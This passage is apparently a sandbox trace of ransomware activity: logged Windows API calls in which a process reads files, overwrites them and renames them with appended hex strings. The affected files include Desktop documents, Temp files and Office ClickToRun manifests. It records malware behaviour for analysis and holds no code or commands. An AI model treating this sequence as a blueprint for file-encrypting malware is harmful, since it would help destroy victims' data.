0x318a278 [0118.863] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x29fff60, FileInformation=0x318a278, Length=0x200, FileInformationClass=0xa) returned 0x0 [0118.864] CloseHandle (hObject=0x320) returned 1 [0118.864] GetProcessHeap () returned 0x600000 [0118.864] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.868] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.945] ReadFile (in: hFile=0x318, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0118.945] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.945] WriteFile (in: hFile=0x308, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0118.946] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0118.951] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0118.952] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2=".1B351A8CA3FE960C7477155C46516D5404489111E7BE67FA4A7D2F832CC7DE1B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html.1B351A8CA3FE960C7477155C46516D5404489111E7BE67FA4A7D2F832CC7DE1B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html.1B351A8CA3FE960C7477155C46516D5404489111E7BE67FA4A7D2F832CC7DE1B" [0118.952] GetProcessHeap () returned 0x600000 [0118.952] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x244) returned 0x625118 [0118.952] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x29fff60, FileInformation=0x625118, Length=0x244, FileInformationClass=0xa) returned 0x0 [0118.953] CloseHandle (hObject=0x318) returned 1 [0118.953] GetProcessHeap () returned 0x600000 [0118.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0118.955] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0119.154] ReadFile (in: hFile=0x318, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x4a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0119.154] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0119.155] WriteFile (in: hFile=0x308, lpBuffer=0x32c0180*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 1 [0119.155] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0122.009] ReadFile (in: hFile=0x324, lpBuffer=0x32e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0) returned 1 [0122.010] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0122.011] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x32c8250, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x32c8250, ReturnLength=0x29fff70) returned 0x0 [0122.011] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BewCXrre4QC 4ZUq.doc", lpString2=".AD5832169C3947AAE2CF1DAD7EDAE1CC18DC0492D4A7F5F7112B9B00C87C6A58" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BewCXrre4QC 4ZUq.doc.AD5832169C3947AAE2CF1DAD7EDAE1CC18DC0492D4A7F5F7112B9B00C87C6A58") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BewCXrre4QC 4ZUq.doc.AD5832169C3947AAE2CF1DAD7EDAE1CC18DC0492D4A7F5F7112B9B00C87C6A58" [0122.011] GetProcessHeap () returned 0x600000 [0122.011] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x138) returned 0x318d680 [0122.011] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x29fff60, FileInformation=0x318d680, Length=0x138, FileInformationClass=0xa) returned 0x0 [0122.012] CloseHandle (hObject=0x324) returned 1 [0122.015] GetProcessHeap () returned 0x600000 [0122.015] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0122.017] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0122.017] WriteFile (in: hFile=0x32c, lpBuffer=0x3310430*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8) returned 1 [0122.018] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0122.575] ReadFile (in: hFile=0x32c, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x6000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0122.576] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0122.577] WriteFile (in: hFile=0x324, lpBuffer=0x32c1040*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0f08 | out: lpBuffer=0x32c1040*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0f08) returned 1 [0122.600] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0123.697] WriteFile (in: hFile=0x318, lpBuffer=0x32e9198*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c9060 | out: lpBuffer=0x32e9198*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c9060) returned 1 [0123.848] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0123.848] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x32f1268, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x32f1268, ReturnLength=0x29fff70) returned 0x0 [0123.849] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\o3MSC.bmp", lpString2=".15FDF76F2BE4B5719ADFA24E364B4E143F0B08FA1A084DEDB758B50F28266259" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\o3MSC.bmp.15FDF76F2BE4B5719ADFA24E364B4E143F0B08FA1A084DEDB758B50F28266259") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\o3MSC.bmp.15FDF76F2BE4B5719ADFA24E364B4E143F0B08FA1A084DEDB758B50F28266259" [0123.849] GetProcessHeap () returned 0x600000 [0123.849] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x116) returned 0x3368bf0 [0123.849] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x29fff60, FileInformation=0x3368bf0, Length=0x116, FileInformationClass=0xa) returned 0x0 [0123.854] CloseHandle (hObject=0x30c) returned 1 [0123.854] GetProcessHeap () returned 0x600000 [0123.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f11b8 | out: hHeap=0x600000) returned 1 [0123.855] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0123.856] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x29fff70) returned 0x0 [0123.856] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\anT3.ods", lpString2=".8A46C7DD27AA1E9C033EF039309F4F6DBC86E590F6656B327C5CC3FDD88C7507" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\anT3.ods.8A46C7DD27AA1E9C033EF039309F4F6DBC86E590F6656B327C5CC3FDD88C7507") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\anT3.ods.8A46C7DD27AA1E9C033EF039309F4F6DBC86E590F6656B327C5CC3FDD88C7507" [0123.856] GetProcessHeap () returned 0x600000 [0123.856] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x6f1e80 [0123.856] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x29fff60, FileInformation=0x6f1e80, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0123.857] CloseHandle (hObject=0x304) returned 1 [0123.858] GetProcessHeap () returned 0x600000 [0123.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.859] GetQueuedCompletionStatus (CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff) Thread: id = 123 os_tid = 0x1c0 [0091.021] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0104.782] ReadFile (in: hFile=0x314, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 0x0 [0104.787] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0104.942] ReadFile (in: hFile=0x30c, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0104.943] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.107] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x31133d0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x31133d0, ReturnLength=0x2b3ff70) returned 0x0 [0105.108] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml", lpString2=".612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B" [0105.108] GetProcessHeap () returned 0x600000 [0105.108] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x21a) returned 0x6b4380 [0105.108] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x2b3ff60, FileInformation=0x6b4380, Length=0x21a, FileInformationClass=0xa) returned 0x0 [0105.109] CloseHandle (hObject=0x308) returned 1 [0105.111] GetProcessHeap () returned 0x600000 [0105.111] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3113320 | out: hHeap=0x600000) returned 1 [0105.113] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.215] ReadFile (in: hFile=0x314, lpBuffer=0x3184b90, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58) returned 1 [0105.232] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.233] WriteFile (in: hFile=0x31c, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0105.234] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.396] ReadFile (in: hFile=0x314, lpBuffer=0x3184b90, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58) returned 1 [0105.397] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.397] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0105.398] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml", lpString2=".BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117" [0105.398] GetProcessHeap () returned 0x600000 [0105.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19e) returned 0x3163308 [0105.398] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x2b3ff60, FileInformation=0x3163308, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0105.398] CloseHandle (hObject=0x308) returned 1 [0105.401] GetProcessHeap () returned 0x600000 [0105.401] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.402] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.404] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x3164b08, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x3164b08, ReturnLength=0x2b3ff70) returned 0x0 [0105.404] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2=".91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A" [0105.404] GetProcessHeap () returned 0x600000 [0105.404] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b8) returned 0x30f09f0 [0105.404] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x2b3ff60, FileInformation=0x30f09f0, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0105.405] CloseHandle (hObject=0x314) returned 1 [0105.411] GetProcessHeap () returned 0x600000 [0105.411] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3164a58 | out: hHeap=0x600000) returned 1 [0105.412] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.653] ReadFile (in: hFile=0x314, lpBuffer=0x3184b90, nNumberOfBytesToRead=0x4a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58) returned 1 [0105.653] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.654] WriteFile (in: hFile=0x314, lpBuffer=0x3184b90*, nNumberOfBytesToWrite=0x4a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58) returned 1 [0105.654] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.663] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x3164b08, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x3164b08, ReturnLength=0x2b3ff70) returned 0x0 [0105.663] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml", lpString2=".A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C" [0105.663] GetProcessHeap () returned 0x600000 [0105.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a2) returned 0x30f1d40 [0105.663] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x2b3ff60, FileInformation=0x30f1d40, Length=0x1a2, FileInformationClass=0xa) returned 0x0 [0105.665] CloseHandle (hObject=0x314) returned 1 [0105.667] GetProcessHeap () returned 0x600000 [0105.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3164a58 | out: hHeap=0x600000) returned 1 [0105.668] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.683] WriteFile (in: hFile=0x32c, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0105.684] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.711] WriteFile (in: hFile=0x32c, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0105.711] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.748] ReadFile (in: hFile=0x308, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.748] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.750] WriteFile (in: hFile=0x308, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0105.751] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.752] NtQueryObject (in: Handle=0x308, 